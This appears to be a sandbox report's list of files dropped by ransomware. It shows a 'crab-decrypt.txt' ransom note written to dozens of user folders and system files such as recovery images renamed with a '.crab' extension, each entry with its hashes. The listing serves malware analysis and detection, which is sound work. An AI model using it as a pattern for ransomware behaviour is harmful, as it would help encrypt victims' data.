c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\word\startup\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\extensions\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\crash reports\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\crash reports\events\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\bookmarkbackups\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\crashes\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\crashes\events\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp\winnt_x86-msvc\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-gmpopenh264\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-gmpopenh264\1.6\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-widevinecdm\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\minidumps\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\saved-telemetry-pings\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sessionstore-backups\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\chrome\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\chrome\idb\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\chrome\idb\2918063365piupsah.files\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\journals\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\skype\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\skype\roottools\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\sun\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\sun\java\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\sun\java\deployment\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\contacts\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\inetcookies\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\desktop\eeftf0ydyhdxb\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\desktop\k7ajnaqg4abjko\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\desktop\k7ajnaqg4abjko\4ol1nvxgeus79kc\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\desktop\ztzo c\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\desktop\ztzo c\w4rvrjq1j87g\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\documents\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\documents\atgk\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\documents\atgk\4f2otgvhrnxrv2j-y\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\documents\atgk\4f2otgvhrnxrv2j-y\9vjrdm9wfvzawqe-9ats\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\documents\atgk\hnnu39xhtzjjp\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\documents\atgk\hnnu39xhtzjjp\9yvqqzj0hmy1fxei6jpm\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\documents\atgk\hz2xerbmw4nhohdiomn\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\music\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\pictures\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\documents\my shapes\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\documents\my shapes\_private\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\videos\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\documents\onenote notebooks\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\documents\onenote notebooks\my notebook\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\documents\outlook files\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\downloads\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\favorites\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\favorites\links\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\links\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\music\lweys\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\j9v0b7unl5ylpdod\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\j9v0b7unl5ylpdod\ap8e0edr\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\j9v0b7unl5ylpdod\dorc\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\j9v0b7unl5ylpdod\vn8dzjxa3\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\zhuqb6w6cwfci3\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\music\lweys\a7wpa\j-ywcejqn_mfqyvgy4\zhuqb6w6cwfci3\rmnortznudyt0d hpk\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\music\ostz2ccmt18\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\network shortcuts\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\onedrive\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\pictures\b8-mos8\opc2yyt8fbscgp\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\recovery\windowsre\boot.sdi.crab 3.02 MB MD5: 427353d47c5fbc4cbda07f809f2bb0eb
SHA1: bf9d22b2b85c414a3162c2ef603d39b4d81a9303
SHA256: eb8e7876781a7c49d9098eadd27c4103524e147ab370dcc1abda785af9337315 		False
...
c:\recovery\windowsre\reagent.xml.crab 1.54 KB MD5: 200b037a6122a3a16eb786919b60d2f1
SHA1: e6df5d099d2a22d8de0099b23b1b4b9956fc0f3a
SHA256: b3a8d25aa275354cb911de190f833476a3315bcff0b61fed6907a4df365f2dfd 		False
...
c:\recovery\windowsre\winre.wim.crab 10.00 MB MD5: b44a1feee8007fe9bc558533a90e838b
SHA1: 0680eed2cc1c5b1056965f4be4a3bd5515bb6f35
SHA256: 280f4be3e3bd1a097e7be2b7d42900ef299e836861e2cf613aa9c0035748c8be 		False
...
c:\system volume information\indexervolumeguid.crab 0.59 KB MD5: 4fa7d2739962e0e1e9f19778ab5c46e7
SHA1: 1c5e8e57c0ed9c946d49f1e996eeca4804c34b8c
SHA256: b8f52bd0fae5b82304cccf4357a079e3c9d242e54af19aa6ec0f6e9a2736f12d 		False
...
c:\system volume information\tracking.log.crab 20.51 KB MD5: 8d4cb64abf26981e06c79928a1bbf534
SHA1: 21316c1fc14aec6e797eeac3ab431add84e134da
SHA256: 4fc5fe5ab2e0ec58e40c1b3cdaa3026850b5a6b0c13f07f46ea11382553b0026 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\1sn5z4igoxlwuaswr7.bmp.crab 1.96 KB MD5: f50b87497234bb4371e29c70a7fbd5ee
SHA1: c9e372d247cb30c71cb223df4d18f1340da0f130
SHA256: e54007eda9b8b23fa070bffcb4b91d0b04ca700de297dcdb7ae12942ff9dec52 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\1zuaicrnw.jpg.crab 81.29 KB MD5: de6578bb5ed47070134adc8e45205847
SHA1: cf799e47ebb8c0c4c441a065587b8624a37e8cc7
SHA256: e120d9f2a01e1a7c2bf3ee6f086c53d66b96e4dce0bf36930b3391cec745fc80 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\2nmjkjaavfc-pzpky201.bmp.crab 65.74 KB MD5: 91b39a9813d299b17fd8dc7c39161c4f
SHA1: ed2108134cb10c485b9fdb9beee827a9f58bfd12
SHA256: 4355bfe98d23b87bc32f1c945811696fa04509989e242a58d87afa41d6122c41 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\4bux8egm.flv.crab 42.37 KB MD5: 527c974a376a7986dc68e43b6722b19a
SHA1: c03d458a813d416ef1345b1076ae60a2b1b30e61
SHA256: 9426846c3f9e68febbb88d36431499929614f82e21392105a21adf8708224e7d 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\5mrmlfab_ytr5cyhx.csv.crab 93.23 KB MD5: ccf0e9cdebe3a207f0309048e9a2219d
SHA1: c98306a69807a7fc854ddf43c0b7bb32d3689637
SHA256: 6512325133f34bd00bc6508a142449217532216c74af28c58e8258cafbffc159 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\6evskbcaqnjngxe rot.bmp.crab 24.90 KB MD5: cd3aa3fa3f9f2623ea6f764589661853
SHA1: 0230d257015b24513e08a26845c1606479bb4a64
